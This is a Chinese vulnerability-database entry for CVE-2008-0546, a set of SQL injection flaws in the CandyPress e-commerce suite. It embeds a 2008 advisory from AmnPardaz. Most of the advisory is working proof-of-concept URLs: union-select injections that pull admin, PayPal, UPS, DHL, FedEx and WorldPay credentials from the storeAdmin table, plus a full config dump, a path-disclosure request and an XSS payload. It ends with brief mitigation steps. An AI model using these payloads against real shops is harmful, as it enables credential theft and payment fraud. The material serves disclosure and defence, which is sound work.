CandyPress 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114397 漏洞类型 SQL注入
发布时间 2008-01-25 更新时间 2008-09-05
CVE编号 CVE-2008-0546 CNNVD-ID CNNVD-200802-013
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4988
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200802-013
|漏洞详情
CandyPress(CP)4.1.1.26及其早期4.1.xversions版本的多个SQL注入漏洞会允许远程攻击者通过(a)ajax/ajax_optInventory.asp的(1)idProduct和(2)options参数或者(b)ajax/ajax_getBrands.asp的(2)recid参数来执行任意SQL命令。
|漏洞EXP
########################## WwW.BugReport.ir ###########################################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: [CandyPress] eCommerce suite
# Vendor: http://www.candypress.com/
# Bugs: SQL Injection + XSS + Path Disclosure in CandyPress
# Vulnerable Version: 4.1.1.26
# Exploit: Available
# Fix Available: Yes!, Update to 4.1.1.27 (http://www.candypress.com/CPforum/forum_posts.asp?TID=10630&PN=1) (There is a fast solution too)
###################################################################################

####################
- Description:
####################
The CandyPress eCommerce suite acts as the command center of your online store. Powerful and versatile, yet easy to use and intuitive, it enables you to easily manage and administrate your orders, product catalog, shipping rates, locations, product reviews, customers and much more.

####################
- Vulnerability:
####################
Remote user can see all databases fields (there are a lot of encrypted credit cards), also there are XSS and Path Disclosure bugs too.

POC:
----
Find Version:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='storeVersion'%20or%20'2'='1&action=get&inventory=1
----
Local Setup IP:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='excludeIP'%20or%20'2'='1&action=get&inventory=1
----
Admin Email:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='pEmailAdmin'%20or%20'2'='1&action=get&inventory=1
Admin Email Password:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='pEmailAdminPassword'%20or%20'2'='1&action=get&inventory=1
----
Direct Username:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppDirectUserName'%20or%20'2'='1&action=get&inventory=1
Direct Password:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppDirectPassword'%20or%20'2'='1&action=get&inventory=1
Direct Signature:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppDirectSignature'%20or%20'2'='1&action=get&inventory=1
----
pp Password:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppPassword'%20or%20'2'='1&action=get&inventory=1
ppUsername:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppUserName'%20or%20'2'='1&action=get&inventory=1
ppSignature:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppSignature'%20or%20'2'='1&action=get&inventory=1
----
UPS UserID:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSUserID'%20or%20'2'='1&action=get&inventory=1
UPS Password:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSPassword'%20or%20'2'='1&action=get&inventory=1
UPS Access ID:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSAccessID'%20or%20'2'='1&action=get&inventory=1
----
PayPal ... Login:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='VeriSignLogin'%20or%20'2'='1&action=get&inventory=1
PayPal ... Partner:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='VeriSignPartner'%20or%20'2'='1&action=get&inventory=1
PayPal ... Passowrd:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='VeriSignPassword'%20or%20'2'='1&action=get&inventory=1
----
WorldPay Call Back Password:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='WorldPayCallbackPW'%20or%20'2'='1&action=get&inventory=1
WorldPay SID:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='WorldPayOutSID'%20or%20'2'='1&action=get&inventory=1
----
DHL Password:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='DHLPassword'%20or%20'2'='1&action=get&inventory=1
DHL UserID:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='DHLUserID'%20or%20'2'='1&action=get&inventory=1
----
Fedex Password:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='FEDEXPassword'%20or%20'2'='1&action=get&inventory=1
Fedex UserID:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='FEDEXUserID'%20or%20'2'='1&action=get&inventory=1
----
Admin Email Password:
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=-1')%20union%20select%20configVar%20as%20configHelp%20from%20storeAdmin%20where%20('1'='1
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=-1')%20union%20select%20configVal%20as%20configHelp%20from%20storeAdmin%20where%20configVar='pEmailAdmin'%20or%20('1'='2
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=-1')%20union%20select%20configVal%20as%20configHelp%20from%20storeAdmin%20where%20configVar='pEmailAdminPassword'%20or%20('1'='2
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=-1')%20union%20select%20configVar%20as%20configHelp%20from%20storeAdmin%20where%20('1'='1
----
Full data disclosure:
http://[CandyPressURL]/ajax/ajax_getBrands.asp?recid=1%20or%201=1%20union%20select%20configVal,configVar%20from%20storeAdmin
----
Path Disclosure:
http://[CandyPressURL]/admin/SA_shipFedExMeter.asp?FedExAccount=admin
---
XSS Bug:
http://[CandyPressURL]/admin/utilities_ConfigHelp.asp?helpfield=%3Cscript%3Ealert('BugReport.IR from amnpardaz')%3C/script%3E

####################
- Fast Solution :
####################
1- Rename "/Admin" and "/Ajax" directories.
2- Rename (or delete) dangerous files which are:
	/ajax/ajax_optInventory.asp
	/ajax/ajax_getBrands.asp
	/admin/utilities_ConfigHelp.asp
	/admin/SA_shipFedExMeter.asp
	
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

# milw0rm.com [2008-01-25]
|参考资料

来源:BID
名称:27466
链接:http://www.securityfocus.com/bid/27466
来源:MILW0RM
名称:4991
链接:http://www.milw0rm.com/exploits/4991
来源:XF
名称:bubblinglibrary-page-uri-file-include(39969)
链接:http://xforce.iss.net/xforce/xfdb/39969
来源:VUPEN
名称:ADV-2008-0347
链接:http://www.frsirt.com/english/advisories/2008/0347